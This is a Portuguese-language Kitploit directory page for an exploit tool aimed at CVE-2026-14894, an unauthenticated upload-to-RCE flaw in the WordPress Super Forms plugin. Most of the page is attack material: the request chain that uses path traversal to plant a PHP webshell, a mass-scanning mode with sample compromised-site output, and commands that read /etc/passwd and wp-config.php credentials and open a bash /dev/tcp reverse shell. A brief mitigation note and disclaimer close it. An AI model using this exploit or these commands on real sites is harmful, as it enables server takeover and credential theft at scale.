Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-14894 — Exploit PoC para CVE-2026-14894: upload arbitrário de arquivo não autenticado levando à execução remota de código no plugin WordPress Super Forms. Inclui modos de varredura de alvo único e em massa com descoberta automatizada de shell. | Kitploit
Ferramentas/GitHubGitHub/1beelze/cve-2026-14894
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub1beelze/cve-2026-14894

CVE-2026-14894

Exploit PoC para CVE-2026-14894: upload arbitrário de arquivo não autenticado levando à execução remota de código no plugin WordPress Super Forms. Inclui modos de varredura de alvo único e em massa com descoberta automatizada de shell.

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-14894 — Super Forms ≤ 6.3.313


Visão Geral

Upload não autenticado de arquivo arbitrário → Execução remota de código no plugin WordPress Super Forms versões ≤ 6.3.313.

A vulnerabilidade reside no manipulador AJAX super_submit_form, que processa uploads de arquivos através de um campo datauristring sem validar a extensão do arquivo ou o tipo MIME antes de escrever no disco. Um atacante não autenticado pode carregar um webshell PHP e obter Execução Remota de Código completa no servidor alvo.


Detalhes da Vulnerabilidade


Cadeia de Ataque

root@kitploit:~
[1] Obter nonce (nopriv)
    POST /wp-admin/admin-ajax.php
    action=super_create_nonce
         │
         ▼
[2] Carregar shell PHP via datauristring (não autenticado)
    POST /wp-admin/admin-ajax.php
    action=super_submit_form
    data={"sf_upload_field":{"files":[{"datauristring":"data:image/png;base64,..."}]}}
         │
         ├── Path Traversal → /wp-content/themes/<theme>/shell.php  ← principal
         │                                                             (sempre executa)
         │
         └── Pasta aleatória → /wp-content/uploads/superforms/...      ← fallback
                              (execução depende da política do servidor)
         │
         ▼
[3] Descoberta do Shell
    ├── S0: media?parent=entry_id  (WP REST)
    ├── S1: REST /wp/v2/media search (não autenticado)
    ├── S2: Listagem de diretório Apache/nginx
    └── S3: WP sitemap attachment XML
         │
         ▼
[4] RCE → curl "http://target/wp-content/themes/theme/shell.php?c=id"

Requisitos

root@kitploit:~
pip install requests urllib3
  • Python 3.8+
  • Acesso de rede ao site WordPress alvo

Uso

Alvo Único

root@kitploit:~
python cve-2026-14894.py
root@kitploit:~
  CVE-2026-14894  │  Super Forms ≤ 6.3.313
  Upload não autenticado de arquivo → Execução remota de código
  Pesquisador: andrea bocchetti  |  PoC: Beelze

  1  Alvo único
  2  Múltiplos alvos (arquivo)

  Modo (1/2): 1

  URL do alvo             : https://target.com
  ID do Formulário (enter=auto)    :                      ← deixe vazio = descoberta automática
  Nome do Shell (enter=aleatório)  :                      ← deixe vazio = nome aleatório
  Arquivo Shell (enter=embutido)   :                      ← deixe vazio = shell embutido
  Usuário WP (opcional/REST)       :                      ← opcional, melhora a descoberta
  Senha WP  (opcional/REST)        :                      ← opcional

Saída esperada em caso de sucesso:

root@kitploit:~
  ──────────────────────────────────────────────────────────────
  ALVO  https://target.com
  ──────────────────────────────────────────────────────────────

  Super Forms v6.3.301  vulnerável ≤6.3.313
  [1/3] Obter nonce  ......................  ✔  OK  a3f9e1c...  sid=sess_ab...
  [2/3] Upload [xkqmhzjt.php]  ..........  ✔  OK  form_id=42  entry_id=137
  [3/3] Descoberta do shell  ............  ✔  ENCONTRADO → RCE [path traversal → theme]

  ╔══════════════════════════════════════════════════════════════╗
  ║  ✓  PWNED → RCE CONFIRMADO                                   ║
  ║                                                              ║
  ║  Shell  »  https://target.com/wp-content/themes/astra/shell ║
  ║  RCE    »  uid=33(www-data) gid=33(www-data)                ║
  ║                                                              ║
  ║  $ curl "https://target.com/...shell.php?c=whoami"          ║
  ╚══════════════════════════════════════════════════════════════╝

Varredura em Massa

root@kitploit:~
  Modo (1/2): 2

  Arquivo de alvos        : targets.txt     ← uma URL por linha, # = comentário
  ID do Formulário (enter=auto)    :
  Threads (enter=5)       : 10
  Arquivo Shell (enter=embutido)   :
  Usuário WP (opcional/REST)       :
  Senha WP  (opcional/REST)        :

Formato targets.txt:

root@kitploit:~
# Escopo de bug bounty
https://site1.com
https://site2.com
https://site3.com

Saída da varredura em massa:

root@kitploit:~
  ══════════════════════════════════════════════════════════════
  VARREDURA EM MASSA  3 alvos  threads=10
  ══════════════════════════════════════════════════════════════

  [01/03]  https://site1.com  ....  RCE     uid=33(www-data)
           ↳ https://site1.com/wp-content/themes/astra/xkqmhzjt.php
  [02/03]  https://site2.com  ....  WRITE   sem execução
           ↳ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php
  [03/03]  https://site3.com  ....  FALHA   plugin inativo / bloqueado

  ══════════════════════════════════════════════════════════════
  RESUMO  1 RCE  1 WRITE_ONLY  0 TALVEZ  / 3 total
  ══════════════════════════════════════════════════════════════

  SHELLS RCE:
  »  https://site1.com/wp-content/themes/astra/xkqmhzjt.php  (uid=33...)

Shell Personalizado

Você pode fornecer seu próprio arquivo de shell em vez do webshell embutido:

root@kitploit:~
  Arquivo Shell (enter=embutido): /path/to/myshell.php

A ferramenta fará o upload do seu arquivo e tratará qualquer resposta 200 com corpo não vazio como confirmação de RCE.


Interação com o Shell

Após obter o RCE, interaja com o shell:

root@kitploit:~
# Execução de comando
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id"
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd"

# Ler configuração do WordPress (credenciais, BD)
curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php"

# Reverse shell
curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'"

Saídas

Os resultados são salvos automaticamente em:

root@kitploit:~
~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json

Códigos de Status

StatusSignificado
RCEShell PHP confirmado em execução — execução remota de código total

Mitigação

Atualize o Super Forms para ≥ 6.3.314. A correção força a extensão apenas .pdf em uploads via datauristring e adiciona contenção com realpath() para evitar path traversal.


Aviso Legal

Esta ferramenta destina-se exclusivamente a testes de penetração autorizados, pesquisa de bug bounty e fins educacionais.
Não use contra sistemas para os quais você não tenha permissão explícita por escrito para testar.
O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.


CVE-2026-14894 · Super Forms ≤ 6.3.313 · Upload não autenticado RCE
Pesquisador: andrea bocchetti · PoC: Beelze

Baixar ferramenta
CampoDetalhe
ID CVECVE-2026-14894
PluginSuper Forms (WordPress)
Afetado≤ 6.3.313
Corrigido6.3.314 (força extensão .pdf + contenção realpath)
CVSS9.8 Crítico
AutenticaçãoNenhuma
Pesquisadorandrea bocchetti
Ação AJAXsuper_submit_form
Ponto de entradaCampo datauristring → class-ajax.php:2762–2766
Caminho de upload/wp-content/uploads/superforms/YYYY/MM/<13digits>/
WRITE_ONLYArquivo escrito, mas PHP não executado (motor desligado / .htaccess negado)
POSSIBLE_WRITEUpload retornou sucesso, mas a URL do shell não pôde ser resolvida
FAILPlugin inativo, nonce falhou ou versão corrigida detectada